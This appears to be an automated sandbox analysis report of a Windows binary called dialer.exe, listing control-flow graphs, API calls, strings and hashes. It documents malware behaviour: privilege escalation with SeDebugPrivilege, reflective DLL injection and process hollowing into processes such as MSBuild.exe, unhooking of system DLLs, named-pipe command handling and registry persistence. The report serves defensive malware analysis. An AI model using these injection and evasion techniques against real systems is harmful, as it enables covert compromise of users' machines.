                                                                                control_flow_graph 677 7ff749f41880-7ff749f4189c 678 7ff749f418a2-7ff749f418f9 call 7ff749f42420 call 7ff749f42660 677->678 679 7ff749f41a0f-7ff749f41a1f 677->679 678->679 684 7ff749f418ff-7ff749f41910 678->684 685 7ff749f4193e-7ff749f41941 684->685 686 7ff749f41912-7ff749f4191c 684->686 688 7ff749f4194d-7ff749f41954 685->688 689 7ff749f41943-7ff749f41947 685->689 687 7ff749f4191e-7ff749f41929 686->687 686->688 687->688 690 7ff749f4192b-7ff749f4193a 687->690 692 7ff749f4199e-7ff749f419a6 688->692 693 7ff749f41956-7ff749f41961 688->693 689->688 691 7ff749f41a20-7ff749f41a26 689->691 690->685 694 7ff749f41b87-7ff749f41b98 call 7ff749f41d40 691->694 695 7ff749f41a2c-7ff749f41a37 691->695 692->679 697 7ff749f419a8-7ff749f419c1 692->697 696 7ff749f41970-7ff749f4199c call 7ff749f41ba0 693->696 695->692 698 7ff749f41a3d-7ff749f41a5f 695->698 696->692 701 7ff749f419df-7ff749f419e7 697->701 702 7ff749f41a7d-7ff749f41a97 698->702 705 7ff749f419e9-7ff749f41a0d VirtualProtect 701->705 706 7ff749f419d0-7ff749f419dd 701->706 707 7ff749f41a9d-7ff749f41afa 702->707 708 7ff749f41b74-7ff749f41b82 call 7ff749f41d40 702->708 705->706 706->679 706->701 714 7ff749f41afc-7ff749f41b0e 707->714 715 7ff749f41b22-7ff749f41b26 707->715 708->694 716 7ff749f41b5c-7ff749f41b6c 714->716 717 7ff749f41b10-7ff749f41b20 714->717 718 7ff749f41b2c-7ff749f41b30 715->718 719 7ff749f41a70-7ff749f41a77 715->719 716->708 720 7ff749f41b6f call 7ff749f41d40 716->720 717->715 717->716 718->719 721 7ff749f41b36-7ff749f41b53 call 7ff749f41ba0 718->721 719->692 719->702 720->708 721->716
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF749F41247), ref: 00007FF749F419F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                • API String ID: 544645111-395989641
                                                                                • Opcode ID: 13559aeb64fb2ffe53ced46686645c359b0be6a3e885cbb8d1261cf63dbf58fc
                                                                                • Instruction ID: cebcbbc4f4ac4123a814bd03086c2636f6c188427586945bb18c20d1633b573a
                                                                                • Opcode Fuzzy Hash: 13559aeb64fb2ffe53ced46686645c359b0be6a3e885cbb8d1261cf63dbf58fc
                                                                                • Instruction Fuzzy Hash: 4F515B21B4C596D6EB10FF25E840FB8A771AB25BA4F948131DA1D07BD5CE3CE586CB20
                                                                                Function 00007FF749F41800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 724 7ff749f41800-7ff749f41810 725 7ff749f41812-7ff749f41822 724->725 726 7ff749f41824 724->726 727 7ff749f4182b-7ff749f41867 call 7ff749f42290 fprintf 725->727 726->727
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: fprintf
                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                • API String ID: 383729395-3474627141
                                                                                • Opcode ID: f07ade259d76a49c7355787ff54cd97fbf92663c2f6a4f79a8a4cc4fe43bc8c2
                                                                                • Instruction ID: b4704bed93e36289cb7be89a10641205a5d83bb19a04034766ba59019a6a6fba
                                                                                • Opcode Fuzzy Hash: f07ade259d76a49c7355787ff54cd97fbf92663c2f6a4f79a8a4cc4fe43bc8c2
                                                                                • Instruction Fuzzy Hash: 2AF0C211F5CA85C2E710FF24A9418B9E371EBA97C1F809231DE4D53691DF2CE1828310
                                                                                Function 00007FF749F4219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2116483511.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                • Associated: 00000000.00000002.2116427410.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116779468.00007FF749F49000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116800563.00007FF749F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2116820136.00007FF749F4C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117010921.00007FF74A1C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2117047095.00007FF74A1FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff749f40000_file.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 682475483-0
                                                                                • Opcode ID: 85413003506242275302fc94dee06b8c4194a3e3bc5b6f75ffbb971594794f7c
                                                                                • Instruction ID: 0a076ea735b52c9e815197dd34623f4e7a41b0f7dc0af2e4e3983d20c03849fa
                                                                                • Opcode Fuzzy Hash: 85413003506242275302fc94dee06b8c4194a3e3bc5b6f75ffbb971594794f7c
                                                                                • Instruction Fuzzy Hash: 83011625A8DA83C1FB05BF55AD00AB4A270BF64BD0FD50031CA1D03BE4DF2CE9969320

                                                                                Execution Graph

                                                                                Execution Coverage:46.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:40.1%
                                                                                Total number of Nodes:227
                                                                                Total number of Limit Nodes:24
                                                                                execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceExA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 CloseHandle 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap HeapAlloc 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW GetModuleHandleW 427->428 429 1400020ff 427->429 428->429 430 140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 CloseHandle 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpiA 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a CloseHandle 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 481 1400012f1 480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 497 14000145b 497->474 498 140001478 WaitForSingleObject 497->498 501 140001471 CloseHandle 497->501 500 140001487 GetExitCodeThread 498->500 498->501 500->501 501->474 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 CloseHandle 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 ReadFile 540->548 545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 615->616 617 140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641

                                                                                Callgraph

                                                                                Executed Functions

                                                                                Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                                • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                • API String ID: 4177739653-1130149537
                                                                                • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                                • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                                                Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                                • API String ID: 2561231171-3753927220
                                                                                • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                                • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                                                Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                • String ID:
                                                                                • API String ID: 4084875642-0
                                                                                • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                                • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                                                Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                • String ID:
                                                                                • API String ID: 3197395349-0
                                                                                • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                                • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                                                Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                                • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                                  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                                  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                                  • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                                  • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                                  • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                                  • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                                  • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                                  • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                                  • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                                                • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                                • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                                                • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                                • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                • String ID:
                                                                                • API String ID: 1323846700-0
                                                                                • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                                • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                                                Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                • String ID: .text$C:\Windows\System32\
                                                                                • API String ID: 2721474350-832442975
